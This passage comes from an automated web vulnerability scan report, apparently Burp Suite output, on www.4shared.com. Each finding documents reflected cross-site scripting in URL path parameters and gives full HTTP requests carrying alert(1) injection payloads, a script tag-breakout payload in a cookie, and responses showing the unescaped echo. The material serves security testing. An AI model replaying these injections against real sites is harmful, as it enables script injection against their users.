This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d8ddd"-alert(1)-"4eb60d1a81f/BAQD/1/music HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /d8ddd&quot;-alert(1)-&quot;4eb60d1a81f/BAQD/1/music
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1FB68892A373E29C54E58DFCA3C6C717.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/d8ddd"-alert(1)-"4eb60d1a81f/BAQD/1/music";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.362. http://www.4shared.com/q/BAQD/1/photo [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BAQD/1/photo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd1ba"-alert(1)-"41986b68520 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cd1ba"-alert(1)-"41986b68520/BAQD/1/photo HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /cd1ba&quot;-alert(1)-&quot;41986b68520/BAQD/1/photo
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=67639F9FC77CA94F11137417A85EE2B9.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:46 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/cd1ba"-alert(1)-"41986b68520/BAQD/1/photo";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.363. http://www.4shared.com/q/BAQD/1/video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BAQD/1/video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 858cf"-alert(1)-"bdd77823b47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /858cf"-alert(1)-"bdd77823b47/BAQD/1/video HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /858cf&quot;-alert(1)-&quot;bdd77823b47/BAQD/1/video
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3C640796F120D13D434DE54103841592.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/858cf"-alert(1)-"bdd77823b47/BAQD/1/video";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.364. http://www.4shared.com/q/BBQD/1/books_office [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BBQD/1/books_office

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd152"-alert(1)-"2424e2b2550 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fd152"-alert(1)-"2424e2b2550/BBQD/1/books_office HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /fd152&quot;-alert(1)-&quot;2424e2b2550/BBQD/1/books_office
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BC530E46FC3B2E00AA7E9B1A9CBE82FE.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:01 GMT
Connection: close
Content-Length: 36152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/fd152"-alert(1)-"2424e2b2550/BBQD/1/books_office";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

1.365. http://www.4shared.com/q/BBQD/1/music [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BBQD/1/music

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0d14"-alert(1)-"821bdd307fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d0d14"-alert(1)-"821bdd307fa/BBQD/1/music HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /d0d14&quot;-alert(1)-&quot;821bdd307fa/BBQD/1/music
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BBA5D99DE20ED5B76ABAEA41857ABC88.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:50 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/d0d14"-alert(1)-"821bdd307fa/BBQD/1/music";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.366. http://www.4shared.com/q/BBQD/1/photo [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BBQD/1/photo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6737"-alert(1)-"b10306e2af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c6737"-alert(1)-"b10306e2af/BBQD/1/photo HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /c6737&quot;-alert(1)-&quot;b10306e2af/BBQD/1/photo
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=46767249EFBF094A5A5310B7A919D858.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:58 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/c6737"-alert(1)-"b10306e2af/BBQD/1/photo";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.367. http://www.4shared.com/q/BBQD/1/video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BBQD/1/video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82467"-alert(1)-"f15a819900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /82467"-alert(1)-"f15a819900/BBQD/1/video HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /82467&quot;-alert(1)-&quot;f15a819900/BBQD/1/video
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E3054CC4BE274D5119832B17CA3C7098.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:50 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/82467"-alert(1)-"f15a819900/BBQD/1/video";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.368. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /remindPassword.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aea29"-alert(1)-"e20dd6bf12d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /remindPassword.jspaea29"-alert(1)-"e20dd6bf12d HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /remindPassword.jspaea29&quot;-alert(1)-&quot;e20dd6bf12d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F86B22F249A1DEB5A6AA13BACE0EB958.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36153


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/remindPassword.jspaea29"-alert(1)-"e20dd6bf12d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.369. http://www.4shared.com/resellers.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /resellers.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e60e"-alert(1)-"3e718867f77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resellers.jsp4e60e"-alert(1)-"3e718867f77 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /resellers.jsp4e60e&quot;-alert(1)-&quot;3e718867f77
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=51C5BC92D32BA50426A1498130D29879.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:11:16 GMT
Connection: close
Content-Length: 36117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/resellers.jsp4e60e"-alert(1)-"3e718867f77";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.370. http://www.4shared.com/servlet/ProgressStatus [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /servlet/ProgressStatus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbe67"-alert(1)-"1a6337f7227 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servletcbe67"-alert(1)-"1a6337f7227/ProgressStatus HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /servletcbe67&quot;-alert(1)-&quot;1a6337f7227/ProgressStatus
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F6F91A68B3F0560ECAE18DB77F405D5E.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:03 GMT
Connection: close
Content-Length: 36173


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/servletcbe67"-alert(1)-"1a6337f7227/ProgressStatus";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

1.371. http://www.4shared.com/servlet/ProgressStatus [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /servlet/ProgressStatus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bde4"-alert(1)-"3d9d65c0126 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servlet/ProgressStatus1bde4"-alert(1)-"3d9d65c0126 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /servlet/ProgressStatus1bde4&quot;-alert(1)-&quot;3d9d65c0126
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=086DAEE5CF634084B2B41CA6EAB6A38E.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:10 GMT
Connection: close
Content-Length: 36173


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/servlet/ProgressStatus1bde4"-alert(1)-"3d9d65c0126";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.372. http://www.4shared.com/signUpBox.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /signUpBox.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32833"-alert(1)-"cfb3f47bbd9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /signUpBox.jsp32833"-alert(1)-"cfb3f47bbd9?df=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BF)%3C/script%3E&login=3&months=1&password=3&password2=3&planSelect=1&resetDirView=3 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029

Response

HTTP/1.1 404 /signUpBox.jsp32833&quot;-alert(1)-&quot;cfb3f47bbd9
Server: Apache-Coyote/1.1
